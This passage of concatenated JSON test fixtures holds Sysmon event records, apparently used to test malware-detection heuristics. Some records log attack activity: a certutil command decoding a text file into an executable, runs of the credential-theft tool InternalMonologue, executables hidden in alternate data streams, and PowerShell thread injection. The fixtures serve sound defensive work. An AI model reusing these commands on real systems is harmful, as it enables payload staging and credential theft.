(x86)\\Microsoft Office\\Office12\\EXCEL.EXE", 13 | "ParentProcessGuid": "{49F1AF32-001D-5AD6-0000-0010A0430D00}", 14 | "ParentProcessId": "2700", 15 | "ProcessGuid": "{49F1AF32-002F-5AD6-0000-0010A2FF0D00}", 16 | "ProcessId": "2304", 17 | "TerminalSessionId": "1", 18 | "User": "GenEric-PC\\Gen Eric", 19 | "UtcTime": "4242-04-24 13:37:42.422" 20 | }, 21 | "System": { 22 | "Channel": "Microsoft-Windows-Sysmon/Operational", 23 | "Computer": "BLAHBLAH", 24 | "Correlation": {}, 25 | "EventID": "1", 26 | "EventRecordID": "35471", 27 | "Execution": { 28 | "ProcessID": "2948", 29 | "ThreadID": "3028" 30 | }, 31 | "Keywords": "0x8000000000000000", 32 | "Level": "4", 33 | "Opcode": "0", 34 | "Provider": { 35 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 36 | "Name": "Microsoft-Windows-Sysmon" 37 | }, 38 | "Security": { 39 | "UserID": "S-1-5-18" 40 | }, 41 | "Task": "1", 42 | "TimeCreated": { 43 | "SystemTime": "4242-04-24 13:37:42.422" 44 | }, 45 | "Version": "5" 46 | } 47 | } 48 | } 49 | { 50 | "Event": { 51 | "EventData": { 52 | "CommandLine": "certutil -decode C:\\Programdata\\B7O7M3G7.txt C:\\Programdata\\Q1S5F1P6.exe", 53 | "CurrentDirectory": "C:\\Users\\Gen Eric\\Documents\\", 54 | "Hashes": "SHA1=8186D64DD28CD63CA883B1D3CE5F07AEABAD67C0,MD5=0D52559AEF4AA5EAC82F530617032283,SHA256=48850FB7229D99E48C3A749556684E962587058D612C659C58F8B8DB2D00ABEE,IMPHASH=61FA242F31501799B46DF49B9FCC76BB", 55 | "Image": "C:\\Windows\\SysWOW64\\certutil.exe", 56 | "IntegrityLevel": "Medium", 57 | "LogonGuid": "49F1AF32-6417-5A74-0000-002065780100", 58 | "LogonId": "0x00017865", 59 | "ParentCommandLine": "\"C:\\Program Files (x86)\\Microsoft Office\\Office12\\EXCEL.EXE\" /e", 60 | "ParentImage": "C:\\Program Files (x86)\\Microsoft Office\\Office12\\EXCEL.EXE", 61 | "ParentProcessGuid": "49F1AF32-64C3-5A74-0000-0010122C0900", 62 | "ParentProcessId": "1940", 63 | "ProcessGuid": "49F1AF32-64CB-5A74-0000-00101C630900", 64 | "ProcessId": "1924", 65 | "TerminalSessionId": "1", 66 | "User": "GenEric-PC\\Gen Eric", 67 | "UtcTime": "4242-04-24 13:37:42.422" 68 | }, 69 | "System": { 70 | "Channel": "Microsoft-Windows-Sysmon/Operational", 71 | "Computer": "BLAHBLAH", 72 | "Correlation": {}, 73 | "EventID": "1", 74 | "EventRecordID": "103685", 75 | "Execution": { 76 | "ProcessID": "1376", 77 | "ThreadID": "1964" 78 | }, 79 | "Keywords": "0x8000000000000000", 80 | "Level": "4", 81 | "Opcode": "0", 82 | "Provider": { 83 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 84 | "Name": "Microsoft-Windows-Sysmon" 85 | }, 86 | "Security": { 87 | "UserID": "S-1-5-18" 88 | }, 89 | "Task": "1", 90 | "TimeCreated": { 91 | "SystemTime": "4242-04-24 13:37:42.422" 92 | }, 93 | "Version": "5" 94 | } 95 | } 96 | } 97 | -------------------------------------------------------------------------------- /tests/DownloadPath.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"C:\\Users\\calduser1\\Downloads\\Invoke-Monologue\\Internal-Monologue-master\\InternalMonologue\\bin\\Release\\InternalMonologue.exe\"", 5 | "Company": "", 6 | "CurrentDirectory": "C:\\Users\\calduser1\\Downloads\\Invoke-Monologue\\Internal-Monologue-master\\InternalMonologue\\bin\\Release\\", 7 | "Description": "InternalMonologue", 8 | "FileVersion": "1.0.0.0", 9 | "Hashes": "SHA1=A4EB70393F1709775FAED9D8858FCEBE64B62D7B,MD5=AA3B91AE725EC3FFE3BF112AD66BEB58,SHA256=3CAD10BB61B98B7F077746CE32A4ACA07FFB484B17A5F20B51864A99348C497F,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744", 10 | "Image": "C:\\Users\\calduser1\\Downloads\\Invoke-Monologue\\Internal-Monologue-master\\InternalMonologue\\bin\\Release\\InternalMonologue.exe", 11 | "IntegrityLevel": "High", 12 | "LogonGuid": "{49F1AF32-11F0-5A90-0000-002047700900}", 13 | "LogonId": "0x97047", 14 | "ParentCommandLine": "\"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" ", 15 | "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 16 | "ParentProcessGuid": "{49F1AF32-11F1-5A90-0000-00107E7D0900}", 17 | "ParentProcessId": "2856", 18 | "ProcessGuid": "{49F1AF32-393C-5A94-0000-0010BB401200}", 19 | "ProcessId": "1556", 20 | "Product": "InternalMonologue", 21 | "TerminalSessionId": "1", 22 | "User": "CALDERA\\Administrator", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "1289286", 31 | "Execution": { 32 | "ProcessID": "1408", 33 | "ThreadID": "1652" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /tests/ExecDownloadedDocument.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"C:\\Users\\calduser1\\Downloads\\Invoke-Monologue\\Internal-Monologue-master\\InternalMonologue\\bin\\Release\\InternalMonologue.exe\"", 5 | "Company": "", 6 | "CurrentDirectory": "C:\\Users\\calduser1\\Downloads\\Invoke-Monologue\\Internal-Monologue-master\\InternalMonologue\\bin\\Release\\", 7 | "Description": "InternalMonologue", 8 | "FileVersion": "1.0.0.0", 9 | "Hashes": "SHA1=A4EB70393F1709775FAED9D8858FCEBE64B62D7B,MD5=AA3B91AE725EC3FFE3BF112AD66BEB58,SHA256=3CAD10BB61B98B7F077746CE32A4ACA07FFB484B17A5F20B51864A99348C497F,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744", 10 | "Image": "C:\\Users\\calduser1\\Downloads\\Invoke-Monologue\\Internal-Monologue-master\\InternalMonologue\\bin\\Release\\InternalMonologue.exe", 11 | "IntegrityLevel": "High", 12 | "LogonGuid": "{49F1AF32-11F0-5A90-0000-002047700900}", 13 | "LogonId": "0x97047", 14 | "ParentCommandLine": "\"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" ", 15 | "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 16 | "ParentProcessGuid": "{49F1AF32-11F1-5A90-0000-00107E7D0900}", 17 | "ParentProcessId": "2856", 18 | "ProcessGuid": "{49F1AF32-393C-5A94-0000-0010BB401200}", 19 | "ProcessId": "1556", 20 | "Product": "InternalMonologue", 21 | "TerminalSessionId": "1", 22 | "User": "CALDERA\\Administrator", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "1289286", 31 | "Execution": { 32 | "ProcessID": "1408", 33 | "ThreadID": "1652" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /tests/ExecutableADS.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CreationUtcTime": "2018-02-23 13:17:31.176", 5 | "Hash": "SHA1=E8B4D84A28E5EA17272416EC45726964FDF25883,MD5=09F7401D56F2393C6CA534FF0241A590,SHA256=6766717B8AFAFE46B5FD66C7082CCCE6B382CBEA982C73CB651E35DC8187ACE1,IMPHASH=68E56344CAB250384904953E978B70A9", 6 | "Image": "C:\\Windows\\system32\\cmd.exe", 7 | "ProcessGuid": "{49F1AF32-12C5-5A90-0000-00100AEA0B00}", 8 | "ProcessId": "2100", 9 | "TargetFilename": "C:\\Users\\CALDUS~1\\AppData\\Local\\Temp\\test.txt:malicious.exe", 10 | "UtcTime": "4242-04-24 13:37:42.422" 11 | }, 12 | "System": { 13 | "Channel": "Microsoft-Windows-Sysmon/Operational", 14 | "Computer": "BLAHBLAH", 15 | "Correlation": {}, 16 | "EventID": "15", 17 | "EventRecordID": "1274680", 18 | "Execution": { 19 | "ProcessID": "1408", 20 | "ThreadID": "1652" 21 | }, 22 | "Keywords": "0x8000000000000000", 23 | "Level": "4", 24 | "Opcode": "0", 25 | "Provider": { 26 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 27 | "Name": "Microsoft-Windows-Sysmon" 28 | }, 29 | "Security": { 30 | "UserID": "S-1-5-18" 31 | }, 32 | "Task": "15", 33 | "TimeCreated": { 34 | "SystemTime": "4242-04-24 13:37:42.422" 35 | }, 36 | "Version": "2" 37 | } 38 | } 39 | } 40 | { 41 | "Event": { 42 | "EventData": { 43 | "CreationUtcTime": "2018-02-23 13:21:35.152", 44 | "Hash": "SHA1=E8B4D84A28E5EA17272416EC45726964FDF25883,MD5=09F7401D56F2393C6CA534FF0241A590,SHA256=6766717B8AFAFE46B5FD66C7082CCCE6B382CBEA982C73CB651E35DC8187ACE1,IMPHASH=68E56344CAB250384904953E978B70A9", 45 | "Image": "C:\\Windows\\system32\\cmd.exe", 46 | "ProcessGuid": "{49F1AF32-12C5-5A90-0000-00100AEA0B00}", 47 | "ProcessId": "2100", 48 | "TargetFilename": "C:\\Users\\CALDUS~1\\AppData\\Local\\Temp\\test2.txt:malicious.exe", 49 | "UtcTime": "4242-04-24 13:37:42.422" 50 | }, 51 | "System": { 52 | "Channel": "Microsoft-Windows-Sysmon/Operational", 53 | "Computer": "BLAHBLAH", 54 | "Correlation": {}, 55 | "EventID": "15", 56 | "EventRecordID": "1275071", 57 | "Execution": { 58 | "ProcessID": "1408", 59 | "ThreadID": "1652" 60 | }, 61 | "Keywords": "0x8000000000000000", 62 | "Level": "4", 63 | "Opcode": "0", 64 | "Provider": { 65 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 66 | "Name": "Microsoft-Windows-Sysmon" 67 | }, 68 | "Security": { 69 | "UserID": "S-1-5-18" 70 | }, 71 | "Task": "15", 72 | "TimeCreated": { 73 | "SystemTime": "4242-04-24 13:37:42.422" 74 | }, 75 | "Version": "2" 76 | } 77 | } 78 | } 79 | -------------------------------------------------------------------------------- /tests/ExecutableFileCreated.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CreationUtcTime": "2018-04-06 09:12:49.697", 5 | "Image": "System", 6 | "ProcessGuid": "{8C352DC7-327F-5AC7-0000-0010EB030000}", 7 | "ProcessId": "4", 8 | "TargetFilename": "C:\\Windows\\PSEXESVC.exe", 9 | "UtcTime": "4242-04-24 13:37:42.422" 10 | }, 11 | "System": { 12 | "Channel": "Microsoft-Windows-Sysmon/Operational", 13 | "Computer": "BLAHBLAH", 14 | "Correlation": {}, 15 | "EventID": "11", 16 | "EventRecordID": "237698", 17 | "Execution": { 18 | "ProcessID": "1568", 19 | "ThreadID": "1984" 20 | }, 21 | "Keywords": "0x8000000000000000", 22 | "Level": "4", 23 | "Opcode": "0", 24 | "Provider": { 25 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 26 | "Name": "Microsoft-Windows-Sysmon" 27 | }, 28 | "Security": { 29 | "UserID": "S-1-5-18" 30 | }, 31 | "Task": "11", 32 | "TimeCreated": { 33 | "SystemTime": "4242-04-24 13:37:42.422" 34 | }, 35 | "Version": "2" 36 | } 37 | } 38 | } 39 | { 40 | "Event": { 41 | "EventData": { 42 | "CreationUtcTime": "2018-04-06 08:48:25.953", 43 | "Image": "System", 44 | "ProcessGuid": "{8C352DC7-327F-5AC7-0000-0010EB030000}", 45 | "ProcessId": "4", 46 | "TargetFilename": "C:\\Windows\\crater.exe", 47 | "UtcTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "System": { 50 | "Channel": "Microsoft-Windows-Sysmon/Operational", 51 | "Computer": "BLAHBLAH", 52 | "Correlation": {}, 53 | "EventID": "11", 54 | "EventRecordID": "237796", 55 | "Execution": { 56 | "ProcessID": "1568", 57 | "ThreadID": "1984" 58 | }, 59 | "Keywords": "0x8000000000000000", 60 | "Level": "4", 61 | "Opcode": "0", 62 | "Provider": { 63 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 64 | "Name": "Microsoft-Windows-Sysmon" 65 | }, 66 | "Security": { 67 | "UserID": "S-1-5-18" 68 | }, 69 | "Task": "11", 70 | "TimeCreated": { 71 | "SystemTime": "4242-04-24 13:37:42.422" 72 | }, 73 | "Version": "2" 74 | } 75 | } 76 | } 77 | { 78 | "Event": { 79 | "EventData": { 80 | "CreationUtcTime": "2018-04-06 09:16:19.947", 81 | "Image": "System", 82 | "ProcessGuid": "{8C352DC7-327F-5AC7-0000-0010EB030000}", 83 | "ProcessId": "4", 84 | "TargetFilename": "C:\\commander.exe", 85 | "UtcTime": "4242-04-24 13:37:42.422" 86 | }, 87 | "System": { 88 | "Channel": "Microsoft-Windows-Sysmon/Operational", 89 | "Computer": "BLAHBLAH", 90 | "Correlation": {}, 91 | "EventID": "11", 92 | "EventRecordID": "239376", 93 | "Execution": { 94 | "ProcessID": "1568", 95 | "ThreadID": "1984" 96 | }, 97 | "Keywords": "0x8000000000000000", 98 | "Level": "4", 99 | "Opcode": "0", 100 | "Provider": { 101 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 102 | "Name": "Microsoft-Windows-Sysmon" 103 | }, 104 | "Security": { 105 | "UserID": "S-1-5-18" 106 | }, 107 | "Task": "11", 108 | "TimeCreated": { 109 | "SystemTime": "4242-04-24 13:37:42.422" 110 | }, 111 | "Version": "2" 112 | } 113 | } 114 | } 115 | -------------------------------------------------------------------------------- /tests/ExplorerInjection.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+5157a|C:\\Windows\\system32\\KERNELBASE.dll+d817|C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll+2c0e37|UNKNOWN(000007FF002A0A6A)", 5 | "GrantedAccess": "0x1f1fff", 6 | "RuleName": "", 7 | "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 8 | "SourceIntegrityLevel": "Medium", 9 | "SourceProcessGUID": "{49F1AF32-95E7-5D48-0000-00107E820800}", 10 | "SourceProcessId": "2404", 11 | "SourceServices": "N/A", 12 | "SourceThreadId": "2624", 13 | "SourceUser": "GenEric-PC\\Gen Eric", 14 | "TargetImage": "C:\\Windows\\Explorer.EXE", 15 | "TargetIntegrityLevel": "Medium", 16 | "TargetParentProcessGuid": "{49F1AF32-9595-5D48-0000-00100CCF0400}", 17 | "TargetProcessGUID": "{49F1AF32-9596-5D48-0000-0010C6DC0400}", 18 | "TargetProcessId": "1140", 19 | "TargetServices": "N/A", 20 | "TargetUser": "GenEric-PC\\Gen Eric", 21 | "UtcTime": "4242-04-24 13:37:42.422" 22 | }, 23 | "System": { 24 | "Channel": "Microsoft-Windows-Sysmon/Operational", 25 | "Computer": "BLAHBLAH", 26 | "Correlation": {}, 27 | "EventID": "10", 28 | "EventRecordID": "7796592", 29 | "Execution": { 30 | "ProcessID": "1640", 31 | "ThreadID": "1848" 32 | }, 33 | "Keywords": "0x8000000000000000", 34 | "Level": "4", 35 | "Opcode": "0", 36 | "Provider": { 37 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 38 | "Name": "Microsoft-Windows-Sysmon" 39 | }, 40 | "Security": { 41 | "UserID": "S-1-5-18" 42 | }, 43 | "Task": "10", 44 | "TimeCreated": { 45 | "SystemTime": "4242-04-24 13:37:42.422" 46 | }, 47 | "Version": "3" 48 | } 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /tests/Heur7zExec.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"C:\\Users\\Gen Eric\\Desktop\\sublimetext3_2017-09-07T22-42-01+02-00\\sublime_text.exe\" \"C:\\Users\\GENERI~1\\AppData\\Local\\Temp\\7zO4D41B24D\\sysmon.json\"", 5 | "CurrentDirectory": "C:\\Users\\GENERI~1\\AppData\\Local\\Temp\\7zO4D41B24D\\", 6 | "Hashes": "SHA1=7A783002F801C3A843ECDC2835CCCACA7E0997FA,MD5=6CC9F0CBBB6A1FACA78FF64045EAFBCA,SHA256=8A40399733979DADAFE62214FB4DFD681C6C200F1D349EE5FD691C7B876F4F8A,IMPHASH=9FFB2610B37BAABBC88392CD288253E6", 7 | "Image": "C:\\Users\\Gen Eric\\Desktop\\sublimetext3_2017-09-07T22-42-01+02-00\\sublime_text.exe", 8 | "IntegrityLevel": "Medium", 9 | "LogonGuid": "49F1AF32-4E59-59BD-0000-0020F6700100", 10 | "LogonId": "0x000170f6", 11 | "ParentCommandLine": "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"C:\\Program Files\\RawSecTools\\sysmon.json.gz\"", 12 | "ParentImage": "C:\\Program Files\\7-Zip\\7zFM.exe", 13 | "ParentProcessGuid": "49F1AF32-7C11-59BF-0000-0010E8262F00", 14 | "ParentProcessId": "1236", 15 | "ProcessGuid": "49F1AF32-7C13-59BF-0000-00108A342F00", 16 | "ProcessId": "2088", 17 | "TerminalSessionId": "1", 18 | "User": "GenEric-PC\\Gen Eric", 19 | "UtcTime": "4242-04-24 13:37:42.422" 20 | }, 21 | "System": { 22 | "Channel": "Microsoft-Windows-Sysmon/Operational", 23 | "Computer": "BLAHBLAH", 24 | "Correlation": {}, 25 | "EventID": "1", 26 | "EventRecordID": "702650", 27 | "Execution": { 28 | "ProcessID": "1332", 29 | "ThreadID": "1924" 30 | }, 31 | "Keywords": "0x8000000000000000", 32 | "Level": "4", 33 | "Opcode": "0", 34 | "Provider": { 35 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 36 | "Name": "Microsoft-Windows-Sysmon" 37 | }, 38 | "Security": { 39 | "UserID": "S-1-5-18" 40 | }, 41 | "Task": "1", 42 | "TimeCreated": { 43 | "SystemTime": "4242-04-24 13:37:42.422" 44 | }, 45 | "Version": "5" 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /tests/HeurCallShellcode.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "NewThreadId": "2208", 5 | "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 6 | "SourceProcessGuid": "49F1AF32-D3BB-59DC-0000-0010BE140900", 7 | "SourceProcessId": "948", 8 | "StartAddress": "0x0000000000250690", 9 | "StartFunction": "", 10 | "StartModule": "", 11 | "TargetImage": "C:\\Windows\\System32\\notepad.exe", 12 | "TargetProcessGuid": "49F1AF32-D423-59DC-0000-001050310B00", 13 | "TargetProcessId": "2640", 14 | "UtcTime": "4242-04-24 13:37:42.422" 15 | }, 16 | "System": { 17 | "Channel": "Microsoft-Windows-Sysmon/Operational", 18 | "Computer": "BLAHBLAH", 19 | "Correlation": {}, 20 | "EventID": "8", 21 | "EventRecordID": "61733", 22 | "Execution": { 23 | "ProcessID": "1376", 24 | "ThreadID": "1936" 25 | }, 26 | "Keywords": "0x8000000000000000", 27 | "Level": "4", 28 | "Opcode": "0", 29 | "Provider": { 30 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 31 | "Name": "Microsoft-Windows-Sysmon" 32 | }, 33 | "Security": { 34 | "UserID": "S-1-5-18" 35 | }, 36 | "Task": "8", 37 | "TimeCreated": { 38 | "SystemTime": "4242-04-24 13:37:42.422" 39 | }, 40 | "Version": "2" 41 | } 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /tests/HeurDropper.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CreationUtcTime": "2017-10-09 10:01:34.311", 5 | "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\poWERShell.exe", 6 | "ProcessGuid": "49F1AF32-48FD-59DB-0000-00108C980D00", 7 | "ProcessId": "2180", 8 | "TargetFilename": "C:\\Users\\Gen Eric\\AppData\\Local\\Temp\\10454.exe", 9 | "UtcTime": "4242-04-24 13:37:42.422" 10 | }, 11 | "System": { 12 | "Channel": "Microsoft-Windows-Sysmon/Operational", 13 | "Computer": "BLAHBLAH", 14 | "Correlation": {}, 15 | "EventID": "11", 16 | "EventRecordID": "34213", 17 | "Execution": { 18 | "ProcessID": "2160", 19 | "ThreadID": "2380" 20 | }, 21 | "Keywords": "0x8000000000000000", 22 | "Level": "4", 23 | "Opcode": "0", 24 | "Provider": { 25 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 26 | "Name": "Microsoft-Windows-Sysmon" 27 | }, 28 | "Security": { 29 | "UserID": "S-1-5-18" 30 | }, 31 | "Task": "11", 32 | "TimeCreated": { 33 | "SystemTime": "4242-04-24 13:37:42.422" 34 | }, 35 | "Version": "2" 36 | } 37 | } 38 | } 39 | { 40 | "Event": { 41 | "EventData": { 42 | "CreationUtcTime": "2017-10-09 10:01:34.311", 43 | "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\poWERShell.exe", 44 | "ProcessGuid": "49F1AF32-48FD-59DB-0000-00108C980D00", 45 | "ProcessId": "2180", 46 | "TargetFilename": "C:\\Users\\Gen Eric\\AppData\\Local\\Temp\\10454.exe", 47 | "UtcTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "System": { 50 | "Channel": "Microsoft-Windows-Sysmon/Operational", 51 | "Computer": "BLAHBLAH", 52 | "Correlation": {}, 53 | "EventID": "11", 54 | "EventRecordID": "34214", 55 | "Execution": { 56 | "ProcessID": "2160", 57 | "ThreadID": "2380" 58 | }, 59 | "Keywords": "0x8000000000000000", 60 | "Level": "4", 61 | "Opcode": "0", 62 | "Provider": { 63 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 64 | "Name": "Microsoft-Windows-Sysmon" 65 | }, 66 | "Security": { 67 | "UserID": "S-1-5-18" 68 | }, 69 | "Task": "11", 70 | "TimeCreated": { 71 | "SystemTime": "4242-04-24 13:37:42.422" 72 | }, 73 | "Version": "2" 74 | } 75 | } 76 | } 77 | { 78 | "Event": { 79 | "EventData": { 80 | "CreationUtcTime": "2017-10-09 10:01:34.311", 81 | "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\poWERShell.exe", 82 | "ProcessGuid": "49F1AF32-48FD-59DB-0000-00108C980D00", 83 | "ProcessId": "2180", 84 | "TargetFilename": "C:\\Users\\Gen Eric\\AppData\\Local\\Temp\\10454.exe", 85 | "UtcTime": "4242-04-24 13:37:42.422" 86 | }, 87 | "System": { 88 | "Channel": "Microsoft-Windows-Sysmon/Operational", 89 | "Computer": "BLAHBLAH", 90 | "Correlation": {}, 91 | "EventID": "11", 92 | "EventRecordID": "34215", 93 | "Execution": { 94 | "ProcessID": "2160", 95 | "ThreadID": "2380" 96 | }, 97 | "Keywords": "0x8000000000000000", 98 | "Level": "4", 99 | "Opcode": "0", 100 | "Provider": { 101 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 102 | "Name": "Microsoft-Windows-Sysmon" 103 | }, 104 | "Security": { 105 | "UserID": "S-1-5-18" 106 | }, 107 | "Task": "11", 108 | "TimeCreated": { 109 | "SystemTime": "4242-04-24 13:37:42.422" 110 | }, 111 | "Version": "2" 112 | } 113 | } 114 | } 115 | { 116 | "Event": { 117 | "EventData": { 118 | "CreationUtcTime": "2017-10-09 10:01:34.311", 119 | "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\poWERShell.exe", 120 | "ProcessGuid": "49F1AF32-48FD-59DB-0000-00108C980D00", 121 | "ProcessId": "2180", 122 | "TargetFilename": "C:\\Users\\Gen Eric\\AppData\\Local\\Temp\\10454.exe", 123 | "UtcTime": "4242-04-24 13:37:42.422" 124 | }, 125 | "System": { 126 | "Channel": "Microsoft-Windows-Sysmon/Operational", 127 | "Computer": "BLAHBLAH", 128 | "Correlation": {}, 129 | "EventID": "11", 130 | "EventRecordID": "34216", 131 | "Execution": { 132 | "ProcessID": "2160", 133 | "ThreadID": "2380" 134 | }, 135 | "Keywords": "0x8000000000000000", 136 | "Level": "4", 137 | "Opcode": "0", 138 | "Provider": { 139 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 140 | "Name": "Microsoft-Windows-Sysmon" 141 | }, 142 | "Security": { 143 | "UserID": "S-1-5-18" 144 | }, 145 | "Task": "11", 146 | "TimeCreated": { 147 | "SystemTime": "4242-04-24 13:37:42.422" 148 | }, 149 | "Version": "2" 150 | } 151 | } 152 | } 153 | { 154 | "Event": { 155 | "EventData": { 156 | "CreationUtcTime": "2018-02-02 13:16:59.383", 157 | "Image": "C:\\Windows\\SysWOW64\\certutil.exe", 158 | "ProcessGuid": "49F1AF32-64CB-5A74-0000-00101C630900", 159 | "ProcessId": "1924", 160 | "TargetFilename": "C:\\ProgramData\\Q1S5F1P6.exe", 161 | "UtcTime": "4242-04-24 13:37:42.422" 162 | }, 163 | "System": { 164 | "Channel": "Microsoft-Windows-Sysmon/Operational", 165 | "Computer": "BLAHBLAH", 166 | "Correlation": {}, 167 | "EventID": "11", 168 | "EventRecordID": "104116", 169 | "Execution": { 170 | "ProcessID": "1376", 171 | "ThreadID": "1964" 172 | }, 173 | "Keywords": "0x8000000000000000", 174 | "Level": "4", 175 | "Opcode": "0", 176 | "Provider": { 177 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 178 | "Name": "Microsoft-Windows-Sysmon" 179 | }, 180 | "Security": { 181 | "UserID": "S-1-5-18" 182 | }, 183 | "Task": "11", 184 | "TimeCreated": { 185 | "SystemTime": "4242-04-24 13:37:42.422" 186 | }, 187 | "Version": "2" 188 | } 189 | } 190 | } 191 | -------------------------------------------------------------------------------- /tests/HeurMaliciousAccess.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9c524|C:\\Windows\\System32\\KERNELBASE.dll+2730e|C:\\Windows\\System32\\appresolver.dll+21e48|C:\\Windows\\System32\\appresolver.dll+1eed6|C:\\Windows\\System32\\appresolver.dll+1ec47|C:\\Windows\\Explorer.EXE+2986a|C:\\Windows\\Explorer.EXE+296f8|C:\\Windows\\Explorer.EXE+409b4|C:\\Windows\\Explorer.EXE+765e7|C:\\Windows\\Explorer.EXE+403f4|C:\\Windows\\Explorer.EXE+3f5e5|C:\\Windows\\Explorer.EXE+3eadc|C:\\Windows\\Explorer.EXE+66cd5|C:\\Windows\\Explorer.EXE+712e8|C:\\Windows\\System32\\USER32.dll+1681d|C:\\Windows\\System32\\USER32.dll+163ec|C:\\Windows\\System32\\USER32.dll+51a0|C:\\Windows\\SYSTEM32\\ntdll.dll+9fdb4|UNKNOWN(FFFFF8022B270085)|UNKNOWN(FFFFF40FE007C31C)|UNKNOWN(FFFFF40FE00A519E)|UNKNOWN(FFFFF40FE00A4627)|UNKNOWN(FFFFF40FE00A2715)|UNKNOWN(FFFFF40FE00A1E06)", 5 | "GrantedAccess": "0x1410", 6 | "RuleName": "", 7 | "SourceImage": "C:\\Windows\\FakedEvent.EXE", 8 | "SourceIntegrityLevel": "Medium", 9 | "SourceProcessGUID": "{515cd0d1-4b0c-5d3f-0000-0010aa7b0500}", 10 | "SourceProcessId": "4768", 11 | "SourceThreadId": "4932", 12 | "SourceUser": "DESKTOP-LJRVE06\\Generic", 13 | "TargetImage": "C:\\Windows\\System32\\VBoxTray.exe", 14 | "TargetIntegrityLevel": "Medium", 15 | "TargetParentProcessGuid": "{deadbeef}", 16 | "TargetProcessGUID": "{515cd0d1-4b27-5d3f-0000-0010d0710a00}", 17 | "TargetProcessId": "3484", 18 | "TargetUser": "DESKTOP-LJRVE06\\Generic", 19 | "UtcTime": "4242-04-24 13:37:42.422" 20 | }, 21 | "System": { 22 | "Channel": "Microsoft-Windows-Sysmon/Operational", 23 | "Computer": "BLAHBLAH", 24 | "Correlation": {}, 25 | "EventID": "10", 26 | "EventRecordID": "7679371", 27 | "Execution": { 28 | "ProcessID": "892", 29 | "ThreadID": "1536" 30 | }, 31 | "Keywords": "0x8000000000000000", 32 | "Level": "4", 33 | "Opcode": "0", 34 | "Provider": { 35 | "Guid": 